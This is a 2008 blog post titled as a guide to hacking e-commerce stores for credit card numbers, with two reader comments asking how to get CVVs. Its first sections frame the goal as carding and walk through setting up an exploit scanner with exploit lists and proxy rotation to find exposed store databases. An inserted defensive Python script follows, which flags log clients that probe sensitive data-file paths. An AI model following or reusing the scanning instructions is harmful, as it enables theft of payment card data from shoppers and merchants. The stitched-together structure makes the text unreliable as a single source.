Friday, November 21, 2008

How To Hack Shop-Admin And Get Credit Card Numbers

As covered on the main site all information presented within this guide is for
information purposes only. any attempt to use the information within this guide
to commit anything illegal is solely the responsibility of the reader, and
neither i, information leak, nor anyone else affiliated is responsible for
what you do with the following information.


Section 1: the introduction
----------------------------

Originally i was working on a security scanner for ecommerce sites, but since i'm
about to get back into school and won't have as much time as before to really
work on many projects i decided it'd be better to just go ahead and write a
tutorial on the subject. so for this tutorial we will talk about one way a carder
would collect ccs to cash/use/sell/whatever, and that of course is exploiting
ecommerce sites. there are millions of sites out there used by businesses large
and small for peddling their services/merchandise, and needless to say there are
plenty of them out there that are easily exploited. so here it is, the answer to
every "how to hack cc" question out there. enjoy...


Section 2: database vulnerabilities
------------------------------------

One of the most common and easiest ways to exploit ecommerce sites is to use
database vulnerabilities. these are present due to insecure database software
that many ecommerce sites will use for recording and tracking online purchases.
one method that an attacker could use to find such database vulnerabilities on
a specific site is to use an exploiter. exploiters are software that will use
an exploit list to scan for exploits on a target web server, and report back
any positive responses. cmxploiter iv
is an example of an exploiter, though there are others that you can look for to
use as well. the interface for cmxploiter iv is pretty self-explanatory, but i'll
run you through the basics anyway. to use this tool you would first click "load",
which will bring up three different tabs. you would click "exploit lists" to
select an exploit list to use, "proxy list" is to of course select a list of
proxies to use, and "url list" is to select a list of targets to scan. then from
there you would go to options. the first menu to pop up is the current session
options. edit the responses to include in session history so that only the
"200 series responses" (positive responses) are included in the results, and from
here you can also edit the "socket timeout value" based on your internet connection
(leave as is for faster internet connections, set to 40 for slower internet
connections). then go to proxy list selection options and either put in the proxy
you are going to use for the scan, or click "multi-proxy mode" to tell cmxploiter iv
to use the proxy list you loaded. now that you have everything configured go
to start and select the type of scan you want to do. "single url scan" is used to
scan a single server with the exploit list provided, "multi-url scan" is used to
scan every site in the url list for every exploit in the exploit list, and
"single exploit scan" is used to scan every site in the url list for a single
exploit. on a last note with any exploiter you use if the option is available
be sure to set it to use get requests instead of head requests for the scan.
i've found that you get much more accurate results that way. now that i've
covered all the configurations i'm going to provide an exploit list that you
could use for scanning database vulnerabilities...


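Seen from the server side, the scan described in section 2 shows up as one client requesting many data-file paths in a short burst, and any 200 series answer to such a request means the file really is downloadable. The following is an added example, not part of the original post: a log check over constructed Common Log Format lines. The file-type pattern, the threshold and the sample paths are assumptions.

```python
import re
from collections import defaultdict

# Constructed access-log lines (Common Log Format); IPs are documentation ranges.
SAMPLE_LOG = """\
203.0.113.7 - - [21/Nov/2008:10:00:01 +0000] "GET /store/data/shop.mdb HTTP/1.1" 404 210
203.0.113.7 - - [21/Nov/2008:10:00:01 +0000] "GET /cart/db/cart.mdb HTTP/1.1" 404 210
203.0.113.7 - - [21/Nov/2008:10:00:02 +0000] "HEAD /orders/orders.txt HTTP/1.1" 404 0
203.0.113.7 - - [21/Nov/2008:10:00:02 +0000] "GET /shop/backup/shop.sql HTTP/1.1" 200 48211
198.51.100.20 - - [21/Nov/2008:10:05:13 +0000] "GET /products/list.asp?page=2 HTTP/1.1" 200 5120
198.51.100.20 - - [21/Nov/2008:10:05:40 +0000] "GET /orders/order.log HTTP/1.1" 403 199
"""

# client, method (scanners use GET or HEAD), request target, status code
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(GET|HEAD) (\S+) [^"]*" (\d{3}) ')
# Assumed pattern: file types that hold store data and should never be web-served.
SENSITIVE_RE = re.compile(r'\.(mdb|sql|db|dat|log)$|/orders?[^/]*\.txt$', re.I)
PROBE_THRESHOLD = 3  # assumed: this many distinct sensitive paths marks a scan


def analyse(log_text, threshold=PROBE_THRESHOLD):
    """Return (scanning clients, sensitive paths that were answered with 2xx)."""
    probes = defaultdict(set)   # client -> sensitive paths it requested
    exposed = set()             # sensitive paths any client actually received
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue            # skip other methods and malformed lines
        client, _method, target, status = m.groups()
        path = target.split("?", 1)[0]      # ignore the query string
        if not SENSITIVE_RE.search(path):
            continue
        probes[client].add(path)
        if status.startswith("2"):
            exposed.add(path)   # the server handed the file out
    scanners = sorted(c for c, paths in probes.items() if len(paths) >= threshold)
    return scanners, sorted(exposed)


if __name__ == "__main__":
    scanners, exposed = analyse(SAMPLE_LOG)
    print("scanning clients:", scanners)
    print("exposed data files:", exposed)
```

Every path in the second list is a data file that belongs outside the web root or behind a deny rule, whether or not the client that found it crossed the scan threshold.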

5 comments:

kings said...

bro after exploiting what will you do next.....can you please be a little clear

kings said...

after exploiting what else you do to get the cvv
